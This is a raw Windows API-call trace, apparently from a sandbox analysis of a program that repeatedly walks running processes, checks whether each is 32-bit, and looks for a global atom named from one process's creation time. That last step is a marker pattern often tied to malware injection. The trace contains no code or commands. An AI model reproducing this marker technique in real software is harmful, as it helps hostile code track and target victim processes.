	[0114.582] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xeb8) returned 0x698
	[0114.582] IsWow64Process (in: hProcess=0x698, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0114.582] CloseHandle (hObject=0x698) returned 1
	[0114.582] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xecc) returned 0x698
	[0114.582] IsWow64Process (in: hProcess=0x698, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0114.582] CloseHandle (hObject=0x698) returned 1
	[0114.582] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xee0) returned 0x698
	[0114.582] IsWow64Process (in: hProcess=0x698, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0114.582] CloseHandle (hObject=0x698) returned 1
	[0114.582] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xef4) returned 0x698
	[0114.582] IsWow64Process (in: hProcess=0x698, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0114.582] CloseHandle (hObject=0x698) returned 1
	[0114.583] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xf08) returned 0x698
	[0114.583] IsWow64Process (in: hProcess=0x698, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0114.583] CloseHandle (hObject=0x698) returned 1
	[0114.583] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xf24) returned 0x698
	[0114.583] IsWow64Process (in: hProcess=0x698, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0114.583] CloseHandle (hObject=0x698) returned 1
	[0114.583] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xf44) returned 0x698
	[0114.583] IsWow64Process (in: hProcess=0x698, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0114.583] CloseHandle (hObject=0x698) returned 1
	[0114.583] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xf60) returned 0x698
	[0114.583] IsWow64Process (in: hProcess=0x698, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0114.583] CloseHandle (hObject=0x698) returned 1
	[0114.583] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xf78) returned 0x698
	[0114.583] IsWow64Process (in: hProcess=0x698, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0114.583] CloseHandle (hObject=0x698) returned 1
	[0114.584] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xf8c) returned 0x698
	[0114.584] IsWow64Process (in: hProcess=0x698, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0114.584] CloseHandle (hObject=0x698) returned 1
	[0114.584] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xfac) returned 0x698
	[0114.584] IsWow64Process (in: hProcess=0x698, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0114.584] CloseHandle (hObject=0x698) returned 1
	[0114.584] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xfc0) returned 0x698
	[0114.584] IsWow64Process (in: hProcess=0x698, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0114.584] CloseHandle (hObject=0x698) returned 1
	[0114.584] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xfe4) returned 0x698
	[0114.584] IsWow64Process (in: hProcess=0x698, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0114.585] CloseHandle (hObject=0x698) returned 1
	[0114.585] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xc14) returned 0x698
	[0114.585] IsWow64Process (in: hProcess=0x698, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0114.585] CloseHandle (hObject=0x698) returned 1
	[0114.585] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xc1c) returned 0x698
	[0114.585] IsWow64Process (in: hProcess=0x698, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0114.585] CloseHandle (hObject=0x698) returned 1
	[0114.586] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x514) returned 0x698
	[0114.586] IsWow64Process (in: hProcess=0x698, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0114.586] CloseHandle (hObject=0x698) returned 1
	[0114.586] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xc28) returned 0x698
	[0114.586] IsWow64Process (in: hProcess=0x698, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0114.586] CloseHandle (hObject=0x698) returned 1
	[0114.586] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xc3c) returned 0x698
	[0114.586] IsWow64Process (in: hProcess=0x698, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0114.586] CloseHandle (hObject=0x698) returned 1
	[0114.586] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xc3c) returned 0x698
	[0114.587] GetModuleHandleA (lpModuleName="kernel32.dll") returned 0x765a0000
	[0114.587] GetProcAddress (hModule=0x765a0000, lpProcName="GetProcessTimes") returned 0x765c3dc0
	[0114.587] GetProcessTimes (in: hProcess=0x698, lpCreationTime=0x286fadc, lpExitTime=0x286fac4, lpKernelTime=0x286facc, lpUserTime=0x286fad4 | out: lpCreationTime=0x286fadc, lpExitTime=0x286fac4, lpKernelTime=0x286facc, lpUserTime=0x286fad4) returned 1
	[0114.587] wsprintfA (in: param_1=0x3993150, param_2="%d-%08x-%08x" | out: param_1="3132-01d492ec-3643cc1f") returned 22
	[0114.587] GetModuleHandleA (lpModuleName="kernel32.dll") returned 0x765a0000
	[0114.587] GetProcAddress (hModule=0x765a0000, lpProcName="GlobalFindAtomA") returned 0x765bd0c0
	[0114.588] GetModuleHandleA (lpModuleName="kernel32.dll") returned 0x765a0000
	[0114.588] GetProcAddress (hModule=0x765a0000, lpProcName="FindAtomA") returned 0x765bef10
	[0114.588] FindAtomA (lpString="3132-01d492ec-3643cc1f") returned 0x0
	[0114.588] GlobalFindAtomA (lpString="3132-01d492ec-3643cc1f") returned 0xc18f
	[0114.588] CloseHandle (hObject=0x698) returned 1
	[0114.588] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xcf4) returned 0x0
	[0114.588] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x30c) returned 0x698
	[0114.588] IsWow64Process (in: hProcess=0x698, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0114.588] CloseHandle (hObject=0x698) returned 1
	[0114.588] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xdd4) returned 0x698
	[0114.588] IsWow64Process (in: hProcess=0x698, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0114.589] CloseHandle (hObject=0x698) returned 1
	[0114.589] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xd50) returned 0x698
	[0114.589] IsWow64Process (in: hProcess=0x698, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0114.589] CloseHandle (hObject=0x698) returned 1
	[0114.712] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xfc) returned 0x0
	[0114.713] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x144) returned 0x0
	[0114.713] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x18c) returned 0x0
	[0114.713] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x198) returned 0x0
	[0114.713] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x1cc) returned 0x0
	[0114.713] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x1f0) returned 0x0
	[0114.713] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x1f8) returned 0x0
	[0114.714] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x248) returned 0x0
	[0114.714] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x268) returned 0x0
	[0114.714] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x2cc) returned 0x0
	[0114.714] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x324) returned 0x0
	[0114.714] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x34c) returned 0x0
	[0114.714] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x35c) returned 0x0
	[0114.714] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x3a0) returned 0x0
	[0114.715] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x3c0) returned 0x0
	[0114.715] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x3d4) returned 0x0
	[0114.715] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xe4) returned 0x0
	[0114.715] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x460) returned 0x0
	[0114.715] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x50c) returned 0x698
	[0114.715] IsWow64Process (in: hProcess=0x698, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0114.715] CloseHandle (hObject=0x698) returned 1
	[0114.715] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x600) returned 0x0
	[0114.716] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x650) returned 0x0
	[0114.716] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x6e4) returned 0x698
	[0114.716] IsWow64Process (in: hProcess=0x698, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0114.716] CloseHandle (hObject=0x698) returned 1
	[0114.716] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x6d4) returned 0x0
	[0114.716] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x700) returned 0x698
	[0114.716] IsWow64Process (in: hProcess=0x698, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0114.716] CloseHandle (hObject=0x698) returned 1
	[0114.716] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x84c) returned 0x698
	[0114.716] IsWow64Process (in: hProcess=0x698, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0114.716] CloseHandle (hObject=0x698) returned 1
	[0114.717] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x894) returned 0x698
	[0114.717] IsWow64Process (in: hProcess=0x698, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0114.717] CloseHandle (hObject=0x698) returned 1
	[0114.717] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x9cc) returned 0x698
	[0114.717] IsWow64Process (in: hProcess=0x698, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0114.717] CloseHandle (hObject=0x698) returned 1
	[0114.717] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xa38) returned 0x698
	[0114.717] IsWow64Process (in: hProcess=0x698, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0114.717] CloseHandle (hObject=0x698) returned 1
	[0114.717] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xae0) returned 0x698
	[0114.717] IsWow64Process (in: hProcess=0x698, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0114.717] CloseHandle (hObject=0x698) returned 1
	[0114.717] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x924) returned 0x0
	[0114.718] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x310) returned 0x698
	[0114.718] IsWow64Process (in: hProcess=0x698, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0114.718] CloseHandle (hObject=0x698) returned 1
	[0114.718] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xc50) returned 0x698
	[0114.718] IsWow64Process (in: hProcess=0x698, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0114.718] CloseHandle (hObject=0x698) returned 1
	[0114.718] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xd80) returned 0x698
	[0114.718] IsWow64Process (in: hProcess=0x698, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0114.718] CloseHandle (hObject=0x698) returned 1
	[0114.718] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xe90) returned 0x698
	[0114.718] IsWow64Process (in: hProcess=0x698, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0114.718] CloseHandle (hObject=0x698) returned 1
	[0114.719] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xea4) returned 0x698
	[0114.719] IsWow64Process (in: hProcess=0x698, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0114.719] CloseHandle (hObject=0x698) returned 1
	[0114.719] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xeb8) returned 0x698
	[0114.719] IsWow64Process (in: hProcess=0x698, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0114.719] CloseHandle (hObject=0x698) returned 1
	[0114.719] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xecc) returned 0x698
	[0114.719] IsWow64Process (in: hProcess=0x698, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0114.719] CloseHandle (hObject=0x698) returned 1
	[0114.719] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xee0) returned 0x698
	[0114.719] IsWow64Process (in: hProcess=0x698, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0114.719] CloseHandle (hObject=0x698) returned 1
	[0114.719] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xef4) returned 0x698
	[0114.719] IsWow64Process (in: hProcess=0x698, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0114.719] CloseHandle (hObject=0x698) returned 1
	[0114.720] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xf08) returned 0x698
	[0114.720] IsWow64Process (in: hProcess=0x698, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0114.720] CloseHandle (hObject=0x698) returned 1
	[0114.720] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xf24) returned 0x698
	[0114.720] IsWow64Process (in: hProcess=0x698, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0114.720] CloseHandle (hObject=0x698) returned 1
	[0114.720] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xf44) returned 0x698
	[0114.720] IsWow64Process (in: hProcess=0x698, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0114.720] CloseHandle (hObject=0x698) returned 1
	[0114.720] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xf60) returned 0x698
	[0114.720] IsWow64Process (in: hProcess=0x698, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0114.720] CloseHandle (hObject=0x698) returned 1
	[0114.720] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xf78) returned 0x698
	[0114.720] IsWow64Process (in: hProcess=0x698, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0114.720] CloseHandle (hObject=0x698) returned 1
	[0114.721] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xf8c) returned 0x698
	[0114.721] IsWow64Process (in: hProcess=0x698, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0114.721] CloseHandle (hObject=0x698) returned 1
	[0114.721] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xfac) returned 0x698
	[0114.721] IsWow64Process (in: hProcess=0x698, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0114.721] CloseHandle (hObject=0x698) returned 1
	[0114.721] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xfc0) returned 0x698
	[0114.721] IsWow64Process (in: hProcess=0x698, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0114.721] CloseHandle (hObject=0x698) returned 1
	[0114.721] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xfe4) returned 0x698
	[0114.721] IsWow64Process (in: hProcess=0x698, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0114.721] CloseHandle (hObject=0x698) returned 1
	[0114.721] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xc14) returned 0x698
	[0114.721] IsWow64Process (in: hProcess=0x698, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0114.722] CloseHandle (hObject=0x698) returned 1
	[0114.722] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xc1c) returned 0x698
	[0114.722] IsWow64Process (in: hProcess=0x698, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0114.722] CloseHandle (hObject=0x698) returned 1
	[0114.722] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x514) returned 0x698
	[0114.722] IsWow64Process (in: hProcess=0x698, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0114.722] CloseHandle (hObject=0x698) returned 1
	[0114.722] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xc28) returned 0x698
	[0114.722] IsWow64Process (in: hProcess=0x698, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0114.722] CloseHandle (hObject=0x698) returned 1
	[0114.722] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xc3c) returned 0x698
	[0114.722] IsWow64Process (in: hProcess=0x698, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0114.722] CloseHandle (hObject=0x698) returned 1
	[0114.723] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xc3c) returned 0x698
	[0114.723] GetModuleHandleA (lpModuleName="kernel32.dll") returned 0x765a0000
	[0114.723] GetProcAddress (hModule=0x765a0000, lpProcName="GetProcessTimes") returned 0x765c3dc0
	[0114.723] GetProcessTimes (in: hProcess=0x698, lpCreationTime=0x286fadc, lpExitTime=0x286fac4, lpKernelTime=0x286facc, lpUserTime=0x286fad4 | out: lpCreationTime=0x286fadc, lpExitTime=0x286fac4, lpKernelTime=0x286facc, lpUserTime=0x286fad4) returned 1
	[0114.723] wsprintfA (in: param_1=0x3993150, param_2="%d-%08x-%08x" | out: param_1="3132-01d492ec-3643cc1f") returned 22
	[0114.724] GetModuleHandleA (lpModuleName="kernel32.dll") returned 0x765a0000
	[0114.724] GetProcAddress (hModule=0x765a0000, lpProcName="GlobalFindAtomA") returned 0x765bd0c0
	[0114.724] GetModuleHandleA (lpModuleName="kernel32.dll") returned 0x765a0000
	[0114.724] GetProcAddress (hModule=0x765a0000, lpProcName="FindAtomA") returned 0x765bef10
	[0114.724] FindAtomA (lpString="3132-01d492ec-3643cc1f") returned 0x0
	[0114.724] GlobalFindAtomA (lpString="3132-01d492ec-3643cc1f") returned 0xc18f
	[0114.724] CloseHandle (hObject=0x698) returned 1
	[0114.724] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xcf4) returned 0x0
	[0114.725] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x30c) returned 0x698
	[0114.725] IsWow64Process (in: hProcess=0x698, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0114.725] CloseHandle (hObject=0x698) returned 1
	[0114.725] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xdd4) returned 0x698
	[0114.725] IsWow64Process (in: hProcess=0x698, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0114.725] CloseHandle (hObject=0x698) returned 1
	[0114.725] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xd50) returned 0x698
	[0114.725] IsWow64Process (in: hProcess=0x698, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0114.725] CloseHandle (hObject=0x698) returned 1
	[0114.816] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xfc) returned 0x0
	[0114.817] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x144) returned 0x0
	[0114.817] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x18c) returned 0x0
	[0114.817] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x198) returned 0x0
	[0114.817] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x1cc) returned 0x0
	[0114.817] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x1f0) returned 0x0
	[0114.817] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x1f8) returned 0x0
	[0114.818] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x248) returned 0x0
	[0114.818] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x268) returned 0x0
	[0114.818] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x2cc) returned 0x0
	[0114.818] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x324) returned 0x0
	[0114.818] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x34c) returned 0x0
	[0114.819] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x35c) returned 0x0
	[0114.819] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x3a0) returned 0x0
	[0114.819] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x3c0) returned 0x0
	[0114.819] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x3d4) returned 0x0
	[0114.819] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xe4) returned 0x0
	[0114.820] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x460) returned 0x0
	[0114.820] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x50c) returned 0x698
	[0114.820] IsWow64Process (in: hProcess=0x698, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0114.820] CloseHandle (hObject=0x698) returned 1
	[0114.820] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x600) returned 0x0
	[0114.820] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x650) returned 0x0
	[0114.820] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x6e4) returned 0x698
	[0114.820] IsWow64Process (in: hProcess=0x698, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0114.820] CloseHandle (hObject=0x698) returned 1
	[0114.821] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x6d4) returned 0x0
	[0114.821] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x700) returned 0x698
	[0114.821] IsWow64Process (in: hProcess=0x698, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0114.821] CloseHandle (hObject=0x698) returned 1
	[0114.821] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x84c) returned 0x698
	[0114.821] IsWow64Process (in: hProcess=0x698, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0114.821] CloseHandle (hObject=0x698) returned 1
	[0114.821] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x894) returned 0x698
	[0114.821] IsWow64Process (in: hProcess=0x698, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0114.821] CloseHandle (hObject=0x698) returned 1
	[0114.821] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x9cc) returned 0x698
	[0114.821] IsWow64Process (in: hProcess=0x698, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0114.821] CloseHandle (hObject=0x698) returned 1
	[0114.822] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xa38) returned 0x698
	[0114.822] IsWow64Process (in: hProcess=0x698, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0114.822] CloseHandle (hObject=0x698) returned 1
	[0114.822] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xae0) returned 0x698
	[0114.822] IsWow64Process (in: hProcess=0x698, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0114.822] CloseHandle (hObject=0x698) returned 1
	[0114.822] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x924) returned 0x0
	[0114.822] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x310) returned 0x698
	[0114.822] IsWow64Process (in: hProcess=0x698, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0114.822] CloseHandle (hObject=0x698) returned 1
	[0114.822] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xc50) returned 0x698
	[0114.822] IsWow64Process (in: hProcess=0x698, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0114.822] CloseHandle (hObject=0x698) returned 1
	[0114.823] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xd80) returned 0x698
	[0114.823] IsWow64Process (in: hProcess=0x698, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0114.823] CloseHandle (hObject=0x698) returned 1
	[0114.823] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xe90) returned 0x698
	[0114.823] IsWow64Process (in: hProcess=0x698, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0114.823] CloseHandle (hObject=0x698) returned 1
	[0114.823] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xea4) returned 0x698
	[0114.823] IsWow64Process (in: hProcess=0x698, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0114.823] CloseHandle (hObject=0x698) returned 1
	[0114.823] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xeb8) returned 0x698
	[0114.823] IsWow64Process (in: hProcess=0x698, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0114.823] CloseHandle (hObject=0x698) returned 1
	[0114.823] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xecc) returned 0x698
	[0114.823] IsWow64Process (in: hProcess=0x698, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0114.823] CloseHandle (hObject=0x698) returned 1
	[0114.824] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xee0) returned 0x698
	[0114.824] IsWow64Process (in: hProcess=0x698, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0114.824] CloseHandle (hObject=0x698) returned 1
	[0114.824] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xef4) returned 0x698
	[0114.824] IsWow64Process (in: hProcess=0x698, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0114.824] CloseHandle (hObject=0x698) returned 1
	[0114.824] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xf08) returned 0x698
	[0114.824] IsWow64Process (in: hProcess=0x698, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0114.824] CloseHandle (hObject=0x698) returned 1
	[0114.824] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xf24) returned 0x698
	[0114.824] IsWow64Process (in: hProcess=0x698, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0114.824] CloseHandle (hObject=0x698) returned 1
	[0114.824] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xf44) returned 0x698
	[0114.824] IsWow64Process (in: hProcess=0x698, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0114.824] CloseHandle (hObject=0x698) returned 1
	[0114.825] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xf60) returned 0x698
